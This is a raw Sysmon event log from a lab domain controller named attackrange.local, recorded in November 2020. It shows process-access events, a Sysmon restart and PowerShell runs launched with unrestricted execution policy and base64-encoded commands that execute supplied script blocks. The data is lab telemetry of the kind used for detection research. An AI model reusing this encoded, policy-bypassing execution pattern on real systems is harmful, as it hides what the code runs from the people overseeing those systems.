15:50:18.560{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EF02-000000008701}4940C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.572{D28789B6-7C3A-5FA1-EF02-000000008701}4940C:\Windows\System32\wbem\unsecapp.exe10.0.14393.2515 (rs1_release_1.180830-1044)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7ACF-5FA1-E703-000000000000}0x3e70SystemMD5=2E49BB6C9F6599F518FE30BE2F000247,SHA256=20F499D581CF4AF331D8EC8B1E07A32CC1A695EF6790B51DA5EE223C5867154F,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{D28789B6-7AD1-5FA1-0C00-000000008701}572C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000007Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.560{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.545{D28789B6-7ACF-5FA1-0A00-000000008701}852944C:\Windows\system32\services.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.545{D28789B6-7AC1-5FA1-0500-000000008701}636760C:\Windows\system32\csrss.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.545{D28789B6-7ACF-5FA1-0A00-000000008701}8521292C:\Windows\system32\services.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:18.522{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe12.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7ACF-5FA1-E703-000000000000}0x3e70SystemMD5=3DF7619612EA38B34FB094A8B3B7EAD1,SHA256=D52CB464C0B281FB92CBE7FB5370769D6A00369E082DF9147FBE10822397565E,IMPHASH=49AAA307415968B34D3FD1A72DEE6C71{D28789B6-7ACF-5FA1-0A00-000000008701}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 434400x80000000000000002Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local2020-11-03 15:50:18.638Started12.014.40 16341600x80000000000000001Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local2020-11-03 15:50:18.498c:\Program Files\ansible\AttackRangeSysmon.xmlSHA1=662E68DD6B3360E156BDE1F54FD3ED5BB76E8AFC 10341000x8000000000000000108Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.998{D28789B6-7C3B-5FA1-F102-000000008701}15444764C:\Windows\system32\conhost.exe{D28789B6-7C3B-5FA1-F402-000000008701}5084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000107Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.982{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000106Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.982{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000105Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.982{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000104Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.982{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000103Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.982{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000102Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.982{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000101Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.982{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.982{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.982{D28789B6-7AC1-5FA1-0500-000000008701}6361160C:\Windows\system32\csrss.exe{D28789B6-7C3B-5FA1-F402-000000008701}5084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000098Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.982{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000097Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.982{D28789B6-7C3B-5FA1-F302-000000008701}49204348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C3B-5FA1-F402-000000008701}5084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90df32b2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+9029413c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90293e0d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90d45472(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902549a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902b2e72(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902964d7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902964d7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90296368(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+902882ed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90294820(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90294413(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+9029413c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90293e0d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90d45472(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+9027ac6e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+9027a23e(wow64) 154100x800000000000000096Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.995{D28789B6-7C3B-5FA1-F402-000000008701}5084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C3B-5FA1-858E-100000000000}0x108e850HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7C3B-5FA1-F302-000000008701}4920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBR